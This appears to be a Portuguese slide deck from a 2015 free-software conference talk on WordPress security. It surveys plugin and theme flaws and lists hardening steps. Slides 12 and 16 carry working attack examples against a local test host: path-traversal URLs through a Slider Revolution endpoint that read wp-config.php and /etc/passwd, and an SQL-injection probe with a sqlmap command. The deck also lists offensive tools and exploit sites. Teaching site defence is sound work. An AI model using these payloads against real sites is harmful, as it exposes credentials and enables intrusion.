Evento: Flisol DF 2015 Data: 25/05/2015 Palestrante: Thiago Dieb e Lenon Leite Pergunta que não quer calar, o WordPress é seguro ? Avalie nossas considerações e tire suas próprias conclusões. De qualquer maneira apresentaremos as principais vulnerabilidades encontradas. Também mostraremos quais as etapas para alcançar um ótimo nível de segurança em seu CMS.

1. WordPress vs Hacker
Blindando seu WordPress

2. Quem somos?

3. Quem sou ?
Lenon Leite @lenonleite
DevOps + Workholic + TDAH
=
EU

4. Quem sou ?
Thiago Dieb @thiagodieb
++ Ansioso;
-- TDAH;

5. Atual realidade do WordPress
Fonte: https://wappalyzer.com/categories/cms 24/04/2015

6. WordPress é Seguro
● 100% seguro == false;
● WordPress ou CMS próprio?
● WordPress
○ Estável;
○ Rápida resposta de
atualização;
○ Colaborativo;

7. E os plugins e temas?
● Todos os Plugins e Temas são do
WordPress.org == false;
● Utilidade X Segurança == (?);
● Pagos X Não pagos == (?);
● Quanto ++ Plugins == ++ Risco;
● Temas piratas == ++ Risco;

8. Vamos começar….

9. A falhas em temas e plugins...
● LFD (local file download);
● File Upload;
● Sql Injection;
● Brute Force;
● XSS - (Cross-site Scripting)
○ Jetpack, Google Analitcs Yost,
WordPress SEO;

10. LFD
ThemeForest e CodeCanyon;
Lista mais de mil temas…
=O
“Slider Revolution”
http://marketblog.envato.com/news/affected-themes/

11. LFD

12. LFD
Exemplo ...
http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../wp-config.php
http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../../../../etc/passwd

13. LFD

14. File upload
Exemplo ...
http://wordpress.local/wp-
content/themes/curvo/functions/upload-handler.php

15. File upload

16. Sql injection
Exemplo ...
http://wordpress.local/wp-content/plugins/formcraft/form.
php?id=1%27
python sqlmap.py -u 'http://wordpress.local/wp-
content/plugins/formcraft/form.php?id=1' --dbs

17. Sql injection

18. Bruteforce

19. Modo de proteção

20. Previnir - Easy
● Alteração do nome do usuário
“admin” == false;
● Senha HARDCORE == true;
● Somente Plugins e Temas que
vai utilizar == true;
● Vários plugins de segurança ==
false;
● Pesquisar sobre os plugins e
temas utilizados == true;
● Modo Debug false;
● Manter o core, temas e plugins
atualizados;

21. Previnir - Medium
● Desabilitar a função de edição dos
temas e plugins == true;
● Bloquear Brute force == true;
● Bloquear visualização de pasta ==
true;
● Usar robots.txt == true;
● Acessar todos os dias == true;
● Comprar temas ou plugins == false;
● Usar as constantes no wp-config:
WP_CONTENT_DIR, WP_PLUGIN_DIR,
UPLOADS,WP_AUTO_UPDATE_CORE,
WP_HTTP_BLOCK_EXTERNAL

22. Previnir - Hard
● Prepração de infra == true;
● Pentest no próprio site == true
pra porra!
○ Use WpScan;
○ Use Accunetix;
○ Use Metaexploit;
● Alterar e bloquear o wp-admin/ ==
true;
● Bloquear páginas /author/*
● Sempre informado == true;

23. Não basta só proteger o WordPress

24. O cuidado deve ser além

25. Olha quem caiu… kkkk

26. Olha quem caiu… kkkk
Globo

27. Olha quem caiu… kkkk
Extra

28. Ferramentas
WpScan -> Scan de vunerabilidades em WordPress.
http://wpscan.org/
SqlMap -> Exploração de sql injection.
http://sqlmap.org/
MetaSploit -> Exploração de vulnerabilidades.
http://www.metasploit.com/
Acunetix -> Exploração de vulnerabilidades.
http://www.acunetix.com/
John the Ripper -> Ferramenta de Brute Force, e quebra de hashs.
http://www.openwall.com/john/
InurlBr -> Vunerabilidades em Massa.
https://github.com/googleinurl/SCANNER-INURLBR

29. Sites e Links importantes.
Exploiters
http://www.exploit-db.com/
http://1337day.com/
http://www.cvedetails.com/
Links interessantes
http://www.wordpressexploit.com/
https://www.facebook.com/inj3ct0rs

30. Finalizando...
@lenonleite www.
lenonleite.com.br
@ThiagoDieb
www.dieb.com.br
www.aszone.com.br